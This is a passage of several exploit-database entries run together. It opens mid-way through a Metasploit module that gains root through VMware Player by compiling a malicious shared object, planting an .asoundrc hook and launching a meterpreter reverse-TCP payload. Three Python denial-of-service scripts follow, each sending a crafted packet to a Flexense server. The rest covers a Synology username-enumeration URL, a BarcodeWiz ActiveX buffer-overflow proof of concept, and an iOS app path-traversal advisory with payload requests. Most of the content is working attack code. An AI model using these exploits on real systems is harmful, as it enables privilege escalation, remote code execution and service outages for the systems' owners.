'Jann Horn', # Discovery and PoC
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
],
'DisclosureDate' => 'May 22 2017',
'Platform' => 'linux',
'Targets' =>
[
[ 'Linux x86', { 'Arch' => ARCH_X86 } ],
[ 'Linux x64', { 'Arch' => ARCH_X64 } ]
],
'DefaultOptions' =>
{
'Payload' => 'linux/x64/meterpreter_reverse_tcp',
'WfsDelay' => 30,
'PrependFork' => true
},
'DefaultTarget' => 1,
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Privileged' => true ))
register_options [
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
]
end
def has_prereqs?
vmplayer = cmd_exec 'which vmplayer'
if vmplayer.include? 'vmplayer'
vprint_good 'vmplayer is installed'
else
print_error 'vmplayer is not installed. Exploitation will fail.'
return false
end
gcc = cmd_exec 'which gcc'
if gcc.include? 'gcc'
vprint_good 'gcc is installed'
else
print_error 'gcc is not installed. Compiling will fail.'
return false
end
true
end
def check
unless has_prereqs?
print_error 'Target missing prerequisites'
return CheckCode::Safe
end
begin
config = read_file '/etc/vmware/config'
rescue
config = ''
end
if config =~ /player\.product\.version\s*=\s*"([\d\.]+)"/
@version = Gem::Version.new $1.gsub(/\.$/, '')
vprint_status "VMware is version #{@version}"
else
print_error "Could not determine VMware version."
return CheckCode::Unknown
end
if @version < Gem::Version.new('12.5.6')
print_good 'Target version is vulnerable'
return CheckCode::Vulnerable
end
print_error 'Target version is not vulnerable'
CheckCode::Safe
end
def exploit
if check == CheckCode::Safe
print_error 'Target machine is not vulnerable'
return
end
@home_dir = cmd_exec 'echo ${HOME}'
unless @home_dir
print_error "Could not find user's home directory"
return
end
@prefs_file = "#{@home_dir}/.vmware/preferences"
fname = ".#{rand_text_alphanumeric rand(10) + 5}"
@base_dir = "#{datastore['WritableDir']}/#{fname}"
cmd_exec "mkdir #{@base_dir}"
so = %Q^
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1142
Original shared object code by jhorn
*/
#define _GNU_SOURCE
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/prctl.h>
#include <err.h>
extern char *program_invocation_short_name;
__attribute__((constructor)) void run(void) {
uid_t ruid, euid, suid;
if (getresuid(&ruid, &euid, &suid))
err(1, "getresuid");
if (ruid == 0 || euid == 0 || suid == 0) {
if (setresuid(0, 0, 0) || setresgid(0, 0, 0))
err(1, "setresxid");
system("#{@base_dir}/#{fname}.elf");
_exit(0);
}
}
^
vprint_status "Writing #{@base_dir}/#{fname}.c"
write_file "#{@base_dir}/#{fname}.c", so
vprint_status "Compiling #{@base_dir}/#{fname}.o"
output = cmd_exec "gcc -fPIC -shared -o #{@base_dir}/#{fname}.so #{@base_dir}/#{fname}.c -Wall -ldl -std=gnu99"
unless output == ''
print_error "Compilation failed: #{output}"
return
end
vmx = %Q|
.encoding = "UTF-8"
config.version = "8"
virtualHW.version = "8"
scsi0.present = "FALSE"
memsize = "4"
ide0:0.present = "FALSE"
sound.present = "TRUE"
sound.fileName = "-1"
sound.autodetect = "TRUE"
vmci0.present = "FALSE"
hpet0.present = "FALSE"
displayName = "#{fname}"
guestOS = "other"
nvram = "#{fname}.nvram"
virtualHW.productCompatibility = "hosted"
gui.exitOnCLIHLT = "FALSE"
powerType.powerOff = "soft"
powerType.powerOn = "soft"
powerType.suspend = "soft"
powerType.reset = "soft"
floppy0.present = "FALSE"
monitor_control.disable_longmode = 1
|
vprint_status "Writing #{@base_dir}/#{fname}.vmx"
write_file "#{@base_dir}/#{fname}.vmx", vmx
vprint_status "Writing #{@base_dir}/#{fname}.elf"
write_file "#{@base_dir}/#{fname}.elf", generate_payload_exe
vprint_status "Setting #{@base_dir}/#{fname}.elf executable"
cmd_exec "chmod +x #{@base_dir}/#{fname}.elf"
asoundrc = %Q|
hook_func.pulse_load_if_running {
lib "#{@base_dir}/#{fname}.so"
func "conf_pulse_hook_load_if_running"
}
|
vprint_status "Writing #{@home_dir}/.asoundrc"
write_file "#{@home_dir}/.asoundrc", asoundrc
vprint_status 'Disabling VMware hint popups'
unless directory? "#{@home_dir}/.vmware"
cmd_exec "mkdir #{@home_dir}/.vmware"
@remove_prefs_dir = true
end
if file? @prefs_file
begin
prefs = read_file @prefs_file
rescue
prefs = ''
end
end
if prefs.blank?
prefs = ".encoding = \"UTF8\"\n"
prefs << "pref.vmplayer.firstRunDismissedVersion = \"999\"\n"
prefs << "hints.hideAll = \"TRUE\"\n"
@remove_prefs_file = true
elsif prefs =~ /hints\.hideAll/i
prefs.gsub!(/hints\.hideAll.*$/i, 'hints.hideAll = "TRUE"')
else
prefs.sub!(/\n?\z/, "\nhints.hideAll = \"TRUE\"\n")
end
vprint_status "Writing #{@prefs_file}"
write_file "#{@prefs_file}", prefs
print_status 'Launching VMware Player...'
cmd_exec "vmplayer #{@base_dir}/#{fname}.vmx"
end
def cleanup
print_status "Removing #{@base_dir} directory"
cmd_exec "rm '#{@base_dir}' -rf"
print_status "Removing #{@home_dir}/.asoundrc"
cmd_exec "rm '#{@home_dir}/.asoundrc'"
if @remove_prefs_dir
print_status "Removing #{@home_dir}/.vmware directory"
cmd_exec "rm '#{@home_dir}/.vmware' -rf"
elsif @remove_prefs_file
print_status "Removing #{@prefs_file}"
cmd_exec "rm '#{@prefs_file}' -rf"
end
end
def on_new_session(session)
# if we don't /bin/sh here, our payload times out
session.shell_command_token '/bin/sh'
super
end
end
# Exploit Title: VX Search Enterprise Server v10.1.12 - Denial of Service
# Date: 2017-10-20
# Exploit Author: Ahmad Mahfouz
# Software Link: http://www.vxsearch.com/setups/vxsearchsrv_setup_v10.1.12.exe
# Version: v10.1.12
# Category; Windows Remote DOS
# CVE: CVE-2017-15662
# Author Homepage: www.unixawy.com
# Description In Flexense VX Search Enterprise Server v10.1.12, the Control Protocl suffers from a denial of service. The attack vector is a crafted SERVER_GET_INFO packet sent to control port 9123.
import socket
target = "192.168.72.231"
port = 9123
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((target,port))
packet = "\x75\x19\xba\xab\x03"
packet +="\x00\x00\x00\x01\x00\x00\x00\x1a"
packet += "\x00"
packet += "\x3e" #evil
packet += "\x00"
packet += "\x20"
packet += "\x00"
packet += "\x00"
packet += "\x00"
packet += "\x00\x00\x00\x00"
packet += "SERVER_GET_INFO"
packet += "\x02\x32\x01"
packet += "Data"
packet += "\x01\x30\x01\x00"
packet += "\x04\x02\x74"
packet += "\x18\x18\x00"
s.send(packet)
try:
data = s.recv(100)
print data
except:
print "K1LL3D"
# Exploit Title: Disk Pulse Enterprise Server v10.1.18 - DOS,
# Date: 2017-10-20
# Exploit Author: Ahmad Mahfouz
# Software Link: http://www.diskpulse.com/setups/diskpulsesrv_setup_v10.1.18.exe
# Version: v10.1.18
# Category; Windows Remote DOS
# CVE: CVE-2017-15663
# Author Twitter: @eln1x
# Description In Disk Pulse Enterprise Server v10.1.18, the Control Protocol suffers from a denial of service. The attack vector is a crafted SERVER_GET_INFO packet sent to control port 9120.
import socket
target = "192.168.72.231"
port = 9120
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((target,port))
packet = "\x75\x19\xba\xab\x03"
packet +="\x00\x00\x00\x01\x00\x00\x00\x1a"
packet += "\x00"
packet += "\x3e" #evil
packet += "\x00"
packet += "\x20"
packet += "\x00"
packet += "\x00"
packet += "\x00"
packet += "\x00\x00\x00\x00"
packet += "SERVER_GET_INFO"
packet += "\x02\x32\x01"
packet += "Data"
packet += "\x01\x30\x01\x00"
packet += "\x04\x02\x74"
packet += "\x18\x18\x00"
s.send(packet)
try:
data = s.recv(100)
print data
except:
print "K1LL3D"
# Exploit Title: DiskBoss Enterprise Server 8.5.12 - Denial of Service
# Date: 2017-10-20
# Exploit Author: Ahmad Mahfouz
# Software Link: http:///www.diskboss.com/setups/diskbosssrv_setup_v8.5.12.exe
# Version: v10.1.16
# Category; Windows Remote DOS
# CVE: CVE-2017-15665
# Author Homepage: www.unixawy.com
# Description: DiskBoss Enterprise Server 8.5.12 the Control Protocol suffers from a denial of service. The attack vector is a crafted SERVER_GET_INFO packet sent to control port 8094.
#!/usr/bin/env python
import socket
target = "192.168.72.133"
port = 8094
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((target,port))
packet = "\x75\x19\xba\xab\x03"
packet +="\x00\x00\x00\x01\x00\x00\x00\x1a"
packet += "\x00"
packet += "\x3e"
packet += "\x00"
packet += "\x20"
packet += "\x00"
packet += "\x00"
packet += "\x00"
packet += "\x00\x00\x00\x00"
packet += "SERVER_GET_INFO"
packet += "\x02\x32\x01"
packet += "Data"
packet += "\x01\x30\x01\x00"
packet += "\x04\x02\x74"
packet += "\x18\x18\x00"
s.send(packet)
try:
data = s.recv(100)
except:
print "K1LL3D"
# Exploit Title: Synology DiskStation Manager (DSM) < 6.1.3-15152 - 'forget_passwd.cgi' User Enumeration
# Date: 01/05/2018
# Exploit Author: Steve Kaun
# Vendor Homepage: https://www.synology.com
# Version: Before 6.1.3-15152
# CVE : CVE-2017-9554
Previously this was identified by the developer and the disclosure states "via unspecified vectors" it is possible to enumerate usernames via forget_passwd.cgi
Haven't identified any other disclosures that actually identified the attack vector, figure it would be helpful to another.
"An information exposure vulnerability in forget_passwd.cgi in Synology DiskStation Manager (DSM) before 6.1.3-15152 allows remote attackers to enumerate valid usernames via unspecified vectors."
Well then... Here you go, cracked the code and figured it out.
https://IP_Address:5001/webman/forget_passwd.cgi?user=XXX
Where XXX should be your injection point for username lists.
Several usernames I've found are admin, administrator, root, nobody, ftp, and more. I'm unsure of whether Synology is pulling these entries from it's passwd file or not, but there you go.
# Exploit Title: Sync Breeze Enterprise Server v10.1.16 - Denial of Service
# Date: 2017-10-20
# Exploit Author: Ahmad Mahfouz
# Software Link: http://www.syncbreeze.com/setups/syncbreezesrv_setup_v10.1.16.exe
# Version: v10.1.16
# Category; Windows Remote DOS
# CVE: CVE-2017-15664
# Author Twitter: @eln1x
# Description: Sync Breeze Enterprise Server v10.1.16, the Control Protocol suffers from a denial of service. The attack vector is a crafted SERVER_GET_INFO packet sent to control port 9121.
import socket
target = "192.168.72.231"
port = 9121
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((target,port))
packet = "\x75\x19\xba\xab\x03"
packet +="\x00\x00\x00\x01\x00\x00\x00\x1a"
packet += "\x00"
packet += "\x3e" #evil
packet += "\x00"
packet += "\x20"
packet += "\x00"
packet += "\x00"
packet += "\x00"
packet += "\x00\x00\x00\x00"
packet += "SERVER_GET_INFO"
packet += "\x02\x32\x01"
packet += "Data"
packet += "\x01\x30\x01\x00"
packet += "\x04\x02\x74"
packet += "\x18\x18\x00"
s.send(packet)
try:
data = s.recv(100)
print data
except:
print "K1LL3D"
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/BARCODEWIZ-v6.7-ACTIVEX-COMPONENT-BUFFER-OVERFLOW.txt
[+] ISR: ApparitionSec
Vendor:
=================
www.barcodewiz.com
Product:
=============
BarcodeWiz ActiveX Control < 6.7
BarCodeWiz OnLabel. Generates dynamic barcodes from your imported Excel, CSV, or Access files. Print auto incrementing barcodes;
Choose from hundreds of label layouts; Export as PDF or XPS.
Vulnerability Type:
===================
Buffer Overflow
CVE Reference:
==============
CVE-2018-5221
Security Issue:
================
BarcodeWiz.DLL BottomText and TopText propertys suffer from buffer overflow vulnerability resulting in (SEH) "Structured Exceptional Handler" overwrite .
This can be exploited by a remote attacker to potentially execute arbitrary attacker supplied code. User would have to visit a malicious webpage using
InternetExplorer where the exploit could be triggered.
SEH chain of main thread
Address SE handler
0018DAC0 kernel32.754E48F3
0018EE34 41414141
41414141 *** CORRUPT ENTRY ***
Exception Code: ACCESS_VIOLATION
Disasm: 2045665 MOV [EDX+ECX],AL (BarcodeWiz.DLL)
SEH Chain:
--------------------------------------------------
1 41414141
Called From Returns To
--------------------------------------------------
BarcodeWiz.2045665 BarcodeWiz.202FF50
BarcodeWiz.202FF50 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
41414141 41414141
Report for Clsid: {CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
Exploit/POC:
=============
<object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='VICTIM' />
<script language='vbscript'>
PAYLOAD=String(12308, "A")
VICTIM.BottomText = PAYLOAD
</script>
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
=============================
Vendor Notification: December 26, 2017
Vendor Acknowledgement: January 2, 2018
Vendor "updated version released this week." : January 2, 2018
January 6, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
Document Title:
===============
Photos in Wifi 1.0.1 iOS - Path Traversal Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1600
Release Date:
=============
2018-01-04
Vulnerability Laboratory ID (VL-ID):
====================================
1600
Common Vulnerability Scoring System:
====================================
6.5
Vulnerability Class:
====================
Directory- or Path-Traversal
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
Share the photos and videos of your iPhone/iPad in wifi. Upload photos and videos right to your camera roll without iTunes.
With Photos In Wifi, you can share your whole camera roll, and album, or a selection of photos and videos. Once the app
server is started, you can view, play and download the shared photos and videos from any computer or smartphone web browser.
You can also upload a photo, a video, or a zip file containing 100`s of photos and videos, right into your iPhone/iPad
camera roll. You can also use Photos In Wifi to send multiples full resolution photos and videos in a single email or MMS.
(Copy of the Homepage: https://itunes.apple.com/us/app/photos-in-wifi-share-photos/id966316576 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered a path traversal web vulnerability in the Photos in Wifi v1.0.1 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2018-01-04: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Sebastien BUET
Product: Photos In Wifi - iOS Mobile (Web-Application) 1.0.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
An directory traversal web vulnerability has been discovered in the official Photos in Wifi v1.0.1 iOS mobile web-application.
The vulnerability allows remote attackers to unauthorized access other the mobile application folders to compromise
by an upload of malicious contents.
The vulnerability is located in `Select a photo or a video to upload` module. Remote attackers are able to intercept the vulnerable
filename value in the upload - submit POST method request to compromise the mobile app. The encoding of the ext value and the parse
of the filename value is broken which results obviously in this unexpected behavior. The injection point of the issue is the upload
POST method request with the vulnerable filename value. The execution point occurs in the assets.php file when processing to display
the images or videos.
The security risk of the path traversal vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.5.
Exploitation of the remote web vulnerability requires no user interaction and also no privileged web application user account.
Successful exploitation of the file upload vulnerability results in web-server, web module, website or dbms compromise.
Vulnerable Module(s):
[+] ./assets-library://asset/
Vulnerable File(s):
[+] asset.php
Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without privileged web-application user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Start the web-server (wifi)
2. Go to another computer and login by requesting via http localhost
3. Click upload and choose a random file
4. Start a live session tamper for http
5. Submit the upload to continue with the POST method request
6. Inject to the filename value with a payload and path as extension
7. Continue to reply the request
8. The server responds with 200OK
9. Open the poc url of the path to execute the malicious content to compromise
10. Successful reproduce of the vulnerability!
PoC: URL
http://localhost/assets-library://asset/asset.php?id=40C9C332-857B-4CB8-B848-59A30AA9CF3B&ext=[../not_allowed_directory/].[ext]
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost/
Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
POST-Daten:
POST_DATA[-----------------------------191201034430987
Content-Disposition: form-data; name="file"; filename="../not_allowed_directory/newfile.[ext]"
-
Status: 200[OK]
GET http://localhost/assets-library://asset/asset.php?id=250D47DB-57DD-47E4-B72A-CD4455B06277&ext=php
Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Response Header:
Accept-Ranges[bytes]
Content-Length[0]
Security Risk:
==============
The security risk of the web vulnerability in the wifi interface upload post method request is estimated as high (CVSS 6.5).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails,
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.